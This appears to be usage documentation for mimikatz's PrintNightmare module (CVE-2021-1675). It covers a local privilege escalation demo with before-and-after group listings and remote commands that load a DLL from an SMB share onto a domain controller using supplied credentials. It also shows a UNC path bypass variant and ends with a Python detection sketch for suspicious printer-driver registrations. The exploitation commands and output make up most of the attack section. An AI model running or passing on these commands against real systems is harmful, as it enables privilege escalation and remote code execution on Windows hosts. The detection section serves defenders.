
# printnightmare

`misc::printnightmare` can be used to exploit the [PrintNightmare](https://adamsvoboda.net/breaking-down-printnightmare-cve-2021-1675/) vulnerability in both \[[MS-RPRN RpcAddPrinterDriverEx](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/b96cc497-59e5-4510-ab04-5484993b259b)] and \[[MS-PAR AddPrinterDriverEx](https://docs.microsoft.com/en-us/windows/win32/printdocs/addprinterdriverex)]. The bug was discovered by Zhiniang Peng ([@edwardzpeng](https://twitter.com/edwardzpeng?lang=en)) and Xuefeng Li ([@lxf02942370](https://twitter.com/lxf02942370?lang=en)). The MS-PAR function was discovered by [cube0x0](https://twitter.com/cube0x0). The module has the following command-line arguments:

* `/server`: the target server or workstation to exploit
* `/x64` or `/win64`: the target server or workstation is 64-bit
* `/x86` or `/win32`: the target server or workstation is 32-bit
* `/library`: the DLL to use during exploitation
* `/authuser`: the username to use during exploitation
* `/authdomain`: the Active Directory domain
* `/authpassword`: the password of the user
* `/clean`: clean up the operation

The following example demonstrates local privilege escalation through PrintNightmare. Before exploitation, the `test` user is not part of the local administrators group on the ***Win10.hacklab.local*** machine:

```
PS C:\Users\m3g9tr0n> net user

User accounts for \\WIN10

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
test                     vs2022                   WDAGUtilityAccount
The command completed successfully.

PS C:\Users\m3g9tr0n> net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
hacklab\Domain Admins
hacklab\m3g9tr0n
vs2022
The command completed successfully.
```

The module is then run locally with a DLL. On successful exploitation, the output is:

```
mimikatz # misc::printnightmare /library:C:\Users\Public\DLL.dll
[ms-rprn/ncalrpc] local
> RpcGetPrinterDriverDirectory: C:\Windows\system32\spool\DRIVERS\x64
| mimikatz-{55911f3b-474e-4b31-bb55-a2a6b4fc1e76}-legitprinter / Windows x64 - 0x00008018 - C:\Users\Public\DLL.dll
> RpcAddPrinterDriverEx: OK!
> RpcDeletePrinterDriverEx: OK!
```

The test user is now part of the local administrators group:

```
PS C:\Users\m3g9tr0n> net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
hacklab\Domain Admins
hacklab\m3g9tr0n
test
vs2022
The command completed successfully.
```

For remote exploitation, the following can be used:

```
mimikatz # misc::printnightmare /server:dc.hacklab.local /library:\\win10.hacklab.local\smb\x64\mimilib.dll /authuser:optimus /authpassword:Super_SecretPass1! /authdomain:hacklab.local
```

With the [UNC path bypass](https://twitter.com/gentilkiwi/status/1412771368534528001?s=20):

```
mimikatz # misc::printnightmare /server:dc.hacklab.local /library:\??\UNC\win10.hacklab.local\smb\x64\mimilib.dll /authuser:optimus /authpassword:Super_SecretPass1! /authdomain:hacklab.local
```
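
For detection, the output and command lines above expose three observables: the `mimikatz-{GUID}-legitprinter` driver name, a library loaded from outside the spooler's driver directory, and a remote library path that may be written as `\??\UNC\` instead of `\\`. The Python sketch below is an added example, not code from mimikatz or from this page; the `(driver name, library path)` record format and the trusted-directory allowlist are assumptions to adapt to whatever telemetry records driver registrations in your environment.

```python
import ntpath
import re

# Driver name format visible in the module output on this page.
MIMIKATZ_DRIVER = re.compile(r"^mimikatz-\{[0-9a-f-]{36}\}-legitprinter$", re.I)
# Assumed allowlist of directories driver files normally load from; tune per fleet.
TRUSTED_DIRS = (
    "c:\\windows\\system32\\spool\\drivers\\",
    "c:\\windows\\system32\\driverstore\\filerepository\\",
)
UNC_PREFIXES = ("\\??\\unc\\", "\\\\?\\unc\\")   # NT and Win32 long forms of a UNC path
LOCAL_PREFIXES = ("\\??\\", "\\\\?\\")           # same forms in front of a local path

def normalize(path):
    """Lower-case the path, rewrite NT/Win32 prefixed forms, and collapse '..' segments."""
    p = path.strip().replace("/", "\\").lower()
    for prefix in UNC_PREFIXES:
        if p.startswith(prefix):
            p = "\\\\" + p[len(prefix):]
            break
    else:
        for prefix in LOCAL_PREFIXES:
            if p.startswith(prefix):
                p = p[len(prefix):]
                break
    return ntpath.normpath(p)

def findings(driver_name, library_path):
    """Return the reasons a driver registration looks suspicious (empty list if none)."""
    reasons = []
    p = normalize(library_path)
    if MIMIKATZ_DRIVER.match(driver_name):
        reasons.append("mimikatz-driver-name")   # default name only; trivially changed
    if p.startswith("\\\\"):
        reasons.append("remote-library")
    elif not p.startswith(TRUSTED_DIRS):
        reasons.append("untrusted-local-dir")
    return reasons

# Constructed records; the first three reuse names and paths shown on this page.
SAMPLE = [
    ("mimikatz-{55911f3b-474e-4b31-bb55-a2a6b4fc1e76}-legitprinter", r"C:\Users\Public\DLL.dll"),
    ("printer-a", r"\\win10.hacklab.local\smb\x64\mimilib.dll"),
    ("printer-b", r"\??\UNC\win10.hacklab.local\smb\x64\mimilib.dll"),
    ("printer-c", r"C:\Windows\System32\spool\DRIVERS\x64\3\unidrv.dll"),
]

if __name__ == "__main__":
    for name, path in SAMPLE:
        print(name, path, findings(name, path) or "ok")
```

A rule that only looks for a leading `\\` would miss the `\??\UNC\` record, which is why the path is normalized before it is classified.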

